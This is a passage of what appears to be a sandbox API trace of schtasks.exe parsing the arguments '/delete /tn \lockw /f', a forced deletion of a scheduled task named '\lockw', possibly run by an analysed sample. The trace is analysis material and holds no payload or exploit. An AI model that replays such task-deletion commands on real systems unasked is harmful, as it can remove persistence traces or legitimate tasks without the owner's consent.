[0371.534] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|?|") returned 3
[0371.534] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|tn|") returned 4
[0371.535] lstrlenW (lpString="|?|") returned 3
[0371.535] lstrlenW (lpString="|tn|") returned 4
[0371.535] SetLastError (dwErrCode=0x490)
[0371.535] lstrlenW (lpString="create") returned 6
[0371.535] lstrlenW (lpString="create") returned 6
[0371.535] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.535] lstrlenW (lpString="tn") returned 2
[0371.535] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.535] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|create|") returned 8
[0371.535] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|tn|") returned 4
[0371.536] lstrlenW (lpString="|create|") returned 8
[0371.536] lstrlenW (lpString="|tn|") returned 4
[0371.536] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0
[0371.536] SetLastError (dwErrCode=0x490)
[0371.536] lstrlenW (lpString="delete") returned 6
[0371.536] lstrlenW (lpString="delete") returned 6
[0371.536] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.536] lstrlenW (lpString="tn") returned 2
[0371.536] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.536] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|delete|") returned 8
[0371.536] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|tn|") returned 4
[0371.538] lstrlenW (lpString="|delete|") returned 8
[0371.538] lstrlenW (lpString="|tn|") returned 4
[0371.538] StrStrIW (lpFirst="|delete|", lpSrch="|tn|") returned 0x0
[0371.538] SetLastError (dwErrCode=0x490)
[0371.538] lstrlenW (lpString="query") returned 5
[0371.538] lstrlenW (lpString="query") returned 5
[0371.538] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.538] lstrlenW (lpString="tn") returned 2
[0371.538] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.538] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x8, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|query|") returned 7
[0371.538] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|tn|") returned 4
[0371.538] lstrlenW (lpString="|query|") returned 7
[0371.539] lstrlenW (lpString="|tn|") returned 4
[0371.539] StrStrIW (lpFirst="|query|", lpSrch="|tn|") returned 0x0
[0371.539] SetLastError (dwErrCode=0x490)
[0371.539] lstrlenW (lpString="change") returned 6
[0371.539] lstrlenW (lpString="change") returned 6
[0371.548] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.548] lstrlenW (lpString="tn") returned 2
[0371.548] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.548] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|change|") returned 8
[0371.549] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|tn|") returned 4
[0371.549] lstrlenW (lpString="|change|") returned 8
[0371.549] lstrlenW (lpString="|tn|") returned 4
[0371.549] StrStrIW (lpFirst="|change|", lpSrch="|tn|") returned 0x0
[0371.549] SetLastError (dwErrCode=0x490)
[0371.549] lstrlenW (lpString="run") returned 3
[0371.549] lstrlenW (lpString="run") returned 3
[0371.549] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.549] lstrlenW (lpString="tn") returned 2
[0371.549] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.549] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x6, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|run|") returned 5
[0371.549] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|tn|") returned 4
[0371.549] lstrlenW (lpString="|run|") returned 5
[0371.550] lstrlenW (lpString="|tn|") returned 4
[0371.550] StrStrIW (lpFirst="|run|", lpSrch="|tn|") returned 0x0
[0371.550] SetLastError (dwErrCode=0x490)
[0371.550] lstrlenW (lpString="end") returned 3
[0371.550] lstrlenW (lpString="end") returned 3
[0371.550] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.550] lstrlenW (lpString="tn") returned 2
[0371.550] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.550] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x6, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|end|") returned 5
[0371.550] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|tn|") returned 4
[0371.550] lstrlenW (lpString="|end|") returned 5
[0371.551] lstrlenW (lpString="|tn|") returned 4
[0371.551] StrStrIW (lpFirst="|end|", lpSrch="|tn|") returned 0x0
[0371.551] SetLastError (dwErrCode=0x490)
[0371.551] lstrlenW (lpString="showsid") returned 7
[0371.552] lstrlenW (lpString="showsid") returned 7
[0371.552] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.552] GetProcessHeap () returned 0x60000
[0371.552] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c240) returned 1
[0371.552] GetProcessHeap () returned 0x60000
[0371.552] RtlReAllocateHeap (Heap=0x60000, Flags=0xc, Ptr=0x7c240, Size=0x16) returned 0x7c240
[0371.552] lstrlenW (lpString="tn") returned 2
[0371.553] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.553] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|showsid|") returned 9
[0371.553] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|tn|") returned 4
[0371.553] lstrlenW (lpString="|showsid|") returned 9
[0371.553] lstrlenW (lpString="|tn|") returned 4
[0371.554] StrStrIW (lpFirst="|showsid|", lpSrch="|tn|") returned 0x0
[0371.554] SetLastError (dwErrCode=0x490)
[0371.554] SetLastError (dwErrCode=0x490)
[0371.554] SetLastError (dwErrCode=0x0)
[0371.554] lstrlenW (lpString="/tn") returned 3
[0371.554] StrChrIW (lpStart="/tn", wMatch=0x3a) returned 0x0
[0371.554] SetLastError (dwErrCode=0x490)
[0371.554] SetLastError (dwErrCode=0x0)
[0371.554] lstrlenW (lpString="/tn") returned 3
[0371.554] GetProcessHeap () returned 0x60000
[0371.554] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x8) returned 0x7c1e0
[0371.554] GetProcessHeap () returned 0x60000
[0371.554] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7cc40
[0371.554] SetLastError (dwErrCode=0x0)
[0371.555] SetLastError (dwErrCode=0x0)
[0371.555] lstrlenW (lpString="\\lockw") returned 6
[0371.555] lstrlenW (lpString="-/") returned 2
[0371.555] StrChrIW (lpStart="-/", wMatch=0x5c) returned 0x0
[0371.555] SetLastError (dwErrCode=0x490)
[0371.555] SetLastError (dwErrCode=0x490)
[0371.555] SetLastError (dwErrCode=0x0)
[0371.555] lstrlenW (lpString="\\lockw") returned 6
[0371.555] StrChrIW (lpStart="\\lockw", wMatch=0x3a) returned 0x0
[0371.555] SetLastError (dwErrCode=0x490)
[0371.555] SetLastError (dwErrCode=0x0)
[0371.555] lstrlenW (lpString="\\lockw") returned 6
[0371.555] GetProcessHeap () returned 0x60000
[0371.556] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0xe) returned 0x7c270
[0371.556] GetProcessHeap () returned 0x60000
[0371.556] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7cc70
[0371.556] SetLastError (dwErrCode=0x0)
[0371.556] SetLastError (dwErrCode=0x0)
[0371.556] lstrlenW (lpString="/f") returned 2
[0371.556] lstrlenW (lpString="-/") returned 2
[0371.556] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0371.556] lstrlenW (lpString="?") returned 1
[0371.556] lstrlenW (lpString="?") returned 1
[0371.556] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.556] lstrlenW (lpString="f") returned 1
[0371.556] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.557] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|?|") returned 3
[0371.557] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|f|") returned 3
[0371.557] lstrlenW (lpString="|?|") returned 3
[0371.557] lstrlenW (lpString="|f|") returned 3
[0371.557] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0
[0371.558] SetLastError (dwErrCode=0x490)
[0371.558] lstrlenW (lpString="create") returned 6
[0371.558] lstrlenW (lpString="create") returned 6
[0371.558] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.558] lstrlenW (lpString="f") returned 1
[0371.558] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.574] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|create|") returned 8
[0371.574] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|f|") returned 3
[0371.574] lstrlenW (lpString="|create|") returned 8
[0371.574] lstrlenW (lpString="|f|") returned 3
[0371.574] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0
[0371.574] SetLastError (dwErrCode=0x490)
[0371.574] lstrlenW (lpString="delete") returned 6
[0371.575] lstrlenW (lpString="delete") returned 6
[0371.575] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.575] lstrlenW (lpString="f") returned 1
[0371.575] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.575] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|delete|") returned 8
[0371.575] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|f|") returned 3
[0371.575] lstrlenW (lpString="|delete|") returned 8
[0371.575] lstrlenW (lpString="|f|") returned 3
[0371.575] StrStrIW (lpFirst="|delete|", lpSrch="|f|") returned 0x0
[0371.575] SetLastError (dwErrCode=0x490)
[0371.575] lstrlenW (lpString="query") returned 5
[0371.575] lstrlenW (lpString="query") returned 5
[0371.576] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.576] lstrlenW (lpString="f") returned 1
[0371.576] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.578] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x8, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|query|") returned 7
[0371.578] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|f|") returned 3
[0371.578] lstrlenW (lpString="|query|") returned 7
[0371.578] lstrlenW (lpString="|f|") returned 3
[0371.578] StrStrIW (lpFirst="|query|", lpSrch="|f|") returned 0x0
[0371.578] SetLastError (dwErrCode=0x490)
[0371.578] lstrlenW (lpString="change") returned 6
[0371.578] lstrlenW (lpString="change") returned 6
[0371.578] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.578] lstrlenW (lpString="f") returned 1
[0371.579] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.579] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|change|") returned 8
[0371.579] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|f|") returned 3
[0371.579] lstrlenW (lpString="|change|") returned 8
[0371.579] lstrlenW (lpString="|f|") returned 3
[0371.580] StrStrIW (lpFirst="|change|", lpSrch="|f|") returned 0x0
[0371.580] SetLastError (dwErrCode=0x490)
[0371.580] lstrlenW (lpString="run") returned 3
[0371.580] lstrlenW (lpString="run") returned 3
[0371.580] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.580] lstrlenW (lpString="f") returned 1
[0371.580] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.580] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x6, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|run|") returned 5
[0371.580] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|f|") returned 3
[0371.580] lstrlenW (lpString="|run|") returned 5
[0371.580] lstrlenW (lpString="|f|") returned 3
[0371.580] StrStrIW (lpFirst="|run|", lpSrch="|f|") returned 0x0
[0371.581] SetLastError (dwErrCode=0x490)
[0371.581] lstrlenW (lpString="end") returned 3
[0371.581] lstrlenW (lpString="end") returned 3
[0371.581] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.581] lstrlenW (lpString="f") returned 1
[0371.582] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.582] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x6, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|end|") returned 5
[0371.582] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|f|") returned 3
[0371.582] lstrlenW (lpString="|end|") returned 5
[0371.582] lstrlenW (lpString="|f|") returned 3
[0371.582] StrStrIW (lpFirst="|end|", lpSrch="|f|") returned 0x0
[0371.582] SetLastError (dwErrCode=0x490)
[0371.582] lstrlenW (lpString="showsid") returned 7
[0371.582] lstrlenW (lpString="showsid") returned 7
[0371.582] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.582] lstrlenW (lpString="f") returned 1
[0371.583] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.583] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0xa, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|showsid|") returned 9
[0371.583] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24f628 | out: _Buffer="|f|") returned 3
[0371.584] lstrlenW (lpString="|showsid|") returned 9
[0371.584] lstrlenW (lpString="|f|") returned 3
[0371.584] StrStrIW (lpFirst="|showsid|", lpSrch="|f|") returned 0x0
[0371.584] SetLastError (dwErrCode=0x490)
[0371.584] SetLastError (dwErrCode=0x490)
[0371.584] SetLastError (dwErrCode=0x0)
[0371.584] lstrlenW (lpString="/f") returned 2
[0371.584] StrChrIW (lpStart="/f", wMatch=0x3a) returned 0x0
[0371.584] SetLastError (dwErrCode=0x490)
[0371.584] SetLastError (dwErrCode=0x0)
[0371.584] lstrlenW (lpString="/f") returned 2
[0371.584] GetProcessHeap () returned 0x60000
[0371.584] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x6) returned 0x7c290
[0371.584] GetProcessHeap () returned 0x60000
[0371.585] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7cca0
[0371.585] SetLastError (dwErrCode=0x0)
[0371.585] GetProcessHeap () returned 0x60000
[0371.585] GetProcessHeap () returned 0x60000
[0371.585] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c1e0) returned 1
[0371.585] GetProcessHeap () returned 0x60000
[0371.585] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7c1e0) returned 0x8
[0371.585] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7c1e0 | out: hHeap=0x60000) returned 1
[0371.585] GetProcessHeap () returned 0x60000
[0371.585] GetProcessHeap () returned 0x60000
[0371.585] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7cc40) returned 1
[0371.585] GetProcessHeap () returned 0x60000
[0371.586] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7cc40) returned 0x20
[0371.587] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7cc40 | out: hHeap=0x60000) returned 1
[0371.588] GetProcessHeap () returned 0x60000
[0371.588] GetProcessHeap () returned 0x60000
[0371.588] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c270) returned 1
[0371.588] GetProcessHeap () returned 0x60000
[0371.588] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7c270) returned 0xe
[0371.588] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7c270 | out: hHeap=0x60000) returned 1
[0371.588] GetProcessHeap () returned 0x60000
[0371.588] GetProcessHeap () returned 0x60000
[0371.588] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7cc70) returned 1
[0371.588] GetProcessHeap () returned 0x60000
[0371.588] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7cc70) returned 0x20
[0371.589] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7cc70 | out: hHeap=0x60000) returned 1
[0371.589] GetProcessHeap () returned 0x60000
[0371.589] GetProcessHeap () returned 0x60000
[0371.589] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7c290) returned 1
[0371.589] GetProcessHeap () returned 0x60000
[0371.589] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7c290) returned 0x6
[0371.589] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7c290 | out: hHeap=0x60000) returned 1
[0371.589] GetProcessHeap () returned 0x60000
[0371.589] GetProcessHeap () returned 0x60000
[0371.589] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7cca0) returned 1
[0371.590] GetProcessHeap () returned 0x60000
[0371.590] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7cca0) returned 0x20
[0371.590] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7cca0 | out: hHeap=0x60000) returned 1
[0371.590] GetProcessHeap () returned 0x60000
[0371.590] GetProcessHeap () returned 0x60000
[0371.590] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7b9b0) returned 1
[0371.590] GetProcessHeap () returned 0x60000
[0371.590] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7b9b0) returned 0x18
[0371.590] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7b9b0 | out: hHeap=0x60000) returned 1
[0371.592] SetLastError (dwErrCode=0x0)
[0371.592] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x2, Condition=0x3) returned 0x8000000000000018
[0371.592] VerSetConditionMask (ConditionMask=0x8000000000000018, TypeMask=0x1, Condition=0x3) returned 0x800000000000001b
[0371.592] VerSetConditionMask (ConditionMask=0x800000000000001b, TypeMask=0x20, Condition=0x3) returned 0x800000000001801b
[0371.592] VerifyVersionInfoW (in: lpVersionInformation=0x24f490, dwTypeMask=0x3, dwlConditionMask=0x800000000001801b | out: lpVersionInformation=0x24f490) returned 1
[0371.592] SetLastError (dwErrCode=0x0)
[0371.592] lstrlenW (lpString="delete") returned 6
[0371.592] StrChrIW (lpStart="delete", wMatch=0x7c) returned 0x0
[0371.599] SetLastError (dwErrCode=0x490)
[0371.600] SetLastError (dwErrCode=0x0)
[0371.600] lstrlenW (lpString="delete") returned 6
[0371.600] GetProcessHeap () returned 0x60000
[0371.600] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7cca0
[0371.600] GetProcessHeap () returned 0x60000
[0371.600] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x18) returned 0x7b9b0
[0371.600] _memicmp (_Buf1=0x7b9b0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.600] GetProcessHeap () returned 0x60000
[0371.600] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x16) returned 0x7c1e0
[0371.600] SetLastError (dwErrCode=0x0)
[0371.600] _memicmp (_Buf1=0x7ba70, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.600] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7bc10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\schtasks.exe" (normalized: "c:\\windows\\system32\\schtasks.exe")) returned 0x20
[0371.600] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0371.601] GetProcessHeap () returned 0x60000
[0371.601] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x74e) returned 0x7d4d0
[0371.601] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x7d4d0 | out: lpData=0x7d4d0) returned 1
[0371.601] VerQueryValueW (in: pBlock=0x7d4d0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24f578, puLen=0x24f5e0 | out: lplpBuffer=0x24f578*=0x7d86c, puLen=0x24f5e0) returned 1
[0371.601] _memicmp (_Buf1=0x7ba70, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.602] _vsnwprintf (in: _Buffer=0x7bc10, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x24f558 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0371.602] VerQueryValueW (in: pBlock=0x7d4d0, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x24f5e8, puLen=0x24f5d8 | out: lplpBuffer=0x24f5e8*=0x7d698, puLen=0x24f5d8) returned 1
[0371.602] lstrlenW (lpString="schtasks.exe") returned 12
[0371.602] lstrlenW (lpString="schtasks.exe") returned 12
[0371.602] lstrlenW (lpString=".EXE") returned 4
[0371.602] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0371.602] lstrlenW (lpString="schtasks.exe") returned 12
[0371.602] lstrlenW (lpString=".EXE") returned 4
[0371.602] lstrlenW (lpString="schtasks") returned 8
[0371.602] lstrlenW (lpString="/delete") returned 7
[0371.602] _memicmp (_Buf1=0x7ba70, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.602] _vsnwprintf (in: _Buffer=0x7bc10, _BufferCount=0x19, _Format="%s %s", _ArgList=0x24f558 | out: _Buffer="schtasks /delete") returned 16
[0371.603] _memicmp (_Buf1=0x7ba90, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.603] GetProcessHeap () returned 0x60000
[0371.603] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x20) returned 0x7cc70
[0371.604] _memicmp (_Buf1=0x7bab0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.604] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x7d2c0, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0371.604] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0371.604] GetProcessHeap () returned 0x60000
[0371.604] RtlAllocateHeap (HeapHandle=0x60000, Flags=0xc, Size=0x30) returned 0x77c10
[0371.604] _vsnwprintf (in: _Buffer=0x7c010, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x24f558 | out: _Buffer="Type \"SCHTASKS /DELETE /?\" for usage.") returned 37
[0371.604] GetProcessHeap () returned 0x60000
[0371.604] GetProcessHeap () returned 0x60000
[0371.604] HeapValidate (hHeap=0x60000, dwFlags=0x0, lpMem=0x7d4d0) returned 1
[0371.604] GetProcessHeap () returned 0x60000
[0371.604] RtlSizeHeap (HeapHandle=0x60000, Flags=0x0, MemoryPointer=0x7d4d0) returned 0x74e
[0371.605] HeapFree (in: hHeap=0x60000, dwFlags=0x0, lpMem=0x7d4d0 | out: hHeap=0x60000) returned 1
[0371.605] SetLastError (dwErrCode=0x0)
[0371.605] GetThreadLocale () returned 0x409
[0371.606] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.606] lstrlenW (lpString="delete") returned 6
[0371.606] GetThreadLocale () returned 0x409
[0371.606] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.606] lstrlenW (lpString="?") returned 1
[0371.606] GetThreadLocale () returned 0x409
[0371.606] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.606] lstrlenW (lpString="s") returned 1
[0371.606] GetThreadLocale () returned 0x409
[0371.606] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.606] lstrlenW (lpString="u") returned 1
[0371.606] GetThreadLocale () returned 0x409
[0371.607] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.607] lstrlenW (lpString="p") returned 1
[0371.607] GetThreadLocale () returned 0x409
[0371.607] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.608] lstrlenW (lpString="tn") returned 2
[0371.608] GetThreadLocale () returned 0x409
[0371.608] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0371.608] lstrlenW (lpString="f") returned 1
[0371.608] SetLastError (dwErrCode=0x0)
[0371.608] SetLastError (dwErrCode=0x0)
[0371.608] lstrlenW (lpString="/delete") returned 7
[0371.609] lstrlenW (lpString="-/") returned 2
[0371.609] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0371.609] lstrlenW (lpString="delete") returned 6
[0371.609] lstrlenW (lpString="delete") returned 6
[0371.609] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.609] lstrlenW (lpString="delete") returned 6
[0371.609] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.609] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|delete|") returned 8
[0371.609] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|delete|") returned 8
[0371.609] lstrlenW (lpString="|delete|") returned 8
[0371.609] lstrlenW (lpString="|delete|") returned 8
[0371.609] StrStrIW (lpFirst="|delete|", lpSrch="|delete|") returned="|delete|"
[0371.609] SetLastError (dwErrCode=0x0)
[0371.610] SetLastError (dwErrCode=0x0)
[0371.610] SetLastError (dwErrCode=0x0)
[0371.610] lstrlenW (lpString="/tn") returned 3
[0371.610] lstrlenW (lpString="-/") returned 2
[0371.610] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0371.610] lstrlenW (lpString="delete") returned 6
[0371.610] lstrlenW (lpString="delete") returned 6
[0371.610] _memicmp (_Buf1=0x7c0c0, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.610] lstrlenW (lpString="tn") returned 2
[0371.610] _memicmp (_Buf1=0x7c200, _Buf2=0xffe61b08, _Size=0x7) returned 0
[0371.610] _vsnwprintf (in: _Buffer=0x7c240, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|delete|") returned 8
[0371.611] _vsnwprintf (in: _Buffer=0x7c220, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24f568 | out: _Buffer="|tn|") returned 4
[0371.611] lstrlenW (lpString="|delete|") returned 8
[0371.611] lstrlenW (lpString="|tn|") returned 4
